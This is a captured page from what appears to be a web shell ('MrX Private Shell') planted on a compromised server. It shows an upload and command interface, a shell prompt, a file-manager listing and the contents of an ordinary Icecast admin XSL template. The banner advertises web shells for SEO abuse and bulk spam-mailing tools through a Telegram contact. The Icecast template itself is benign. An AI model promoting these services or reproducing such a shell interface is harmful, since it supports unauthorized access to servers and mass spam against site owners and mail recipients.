__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

kentishfootball@216.73.216.211: ~ $
<xsl:stylesheet xmlns:xsl = "http://www.w3.org/1999/XSL/Transform" version = "1.0" >
<xsl:output omit-xml-declaration="no" method="xml" doctype-public="-//W3C//DTD XHTML 1.0 Strict//EN" doctype-system="http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" indent="yes" encoding="UTF-8" />
<xsl:template match = "/icestats" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<title>Icecast Streaming Media Server</title>
	<link rel="stylesheet" type="text/css" href="/style.css" />
	<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
</head>
<body>
	<h1>Icecast2 Admin</h1>
	<!--index header menu -->
	<div id="menu">
		<ul>
			<li><a href="stats.xsl">Admin Home</a></li>
			<li><a href="listmounts.xsl">Mountpoint List</a></li>
			<li><a href="/status.xsl">Public Home</a></li>
		</ul>
	</div>
	<!--end index header menu -->
	<h2>Manage Authentication</h2>
	<xsl:if test="iceresponse">
		<div class="roundbox">
			<h3>Message</h3>
			<xsl:for-each select="iceresponse">
				<xsl:value-of select="message" /><br />
			</xsl:for-each>
		</div>
	</xsl:if>
	<xsl:for-each select="source">
		<div class="roundbox">
			<h3>Mountpoint <xsl:value-of select="@mount" />
				<xsl:if test="server_name">
					<small><xsl:value-of select="server_name" /></small>
				</xsl:if>
			</h3>
			<ul class="nav">
				<li><a href="listclients.xsl?mount={@mount}">List Clients</a></li>
				<li><a href="moveclients.xsl?mount={@mount}">Move Listeners</a></li>
				<li><a href="updatemetadata.xsl?mount={@mount}">Update Metadata</a></li>
				<li><a href="manageauth.xsl?mount={@mount}">Manage Authentication</a></li>
				<li><a href="killsource.xsl?mount={@mount}">Kill Source</a></li>
			</ul>
			<xsl:if test="User">
				<table class="colortable">
					<thead>
						<tr>
							<td>User</td>
							<td>Action</td>
						</tr>
					</thead>
					<tbody>
						<xsl:variable name="themount"><xsl:value-of select="@mount" /></xsl:variable>
						<xsl:for-each select="User">
							<tr>
								<td>
									<xsl:value-of select="username" />
								</td>
								<td>
									<a href="manageauth.xsl?mount={$themount}&amp;username={username}&amp;action=delete">Delete</a>
								</td>
							</tr>
						</xsl:for-each>
					</tbody>
				</table>
			</xsl:if>
			<form class="alignedform" method="get" action="/admin/manageauth.xsl">
				<fieldset>
					<legend>Add new user</legend>
					<p>
						<label for="username">Username:</label>
						<input type="text" id="username" name="username"/>
					</p>
					<p>
						<label for="password">Password:</label>
						<input type="password" id="password" name="password"/>
					</p>
					<input type="hidden" name="mount" value="{@mount}"/>
					<input type="hidden" name="action" value="add"/>
					<input type="Submit" value="Add"/>
				</fieldset>
			</form>
		</div>
	</xsl:for-each>
	<div id="footer">
		Support icecast development at <a href="https://www.icecast.org/">www.icecast.org</a>
	</div>
</body>
</html>
</xsl:template>
</xsl:stylesheet>

Filemanager

Name Type Size Permission Actions
listclients.xsl File 3.15 KB 0644
listmounts.xsl File 2.2 KB 0644
manageauth.xsl File 2.96 KB 0644
moveclients.xsl File 1.57 KB 0644
response.xsl File 1.26 KB 0644
stats.xsl File 3.24 KB 0644
updatemetadata.xsl File 1.68 KB 0644
vclt.xsl File 2.27 KB 0644
xspf.xsl File 2.91 KB 0644
Filemanager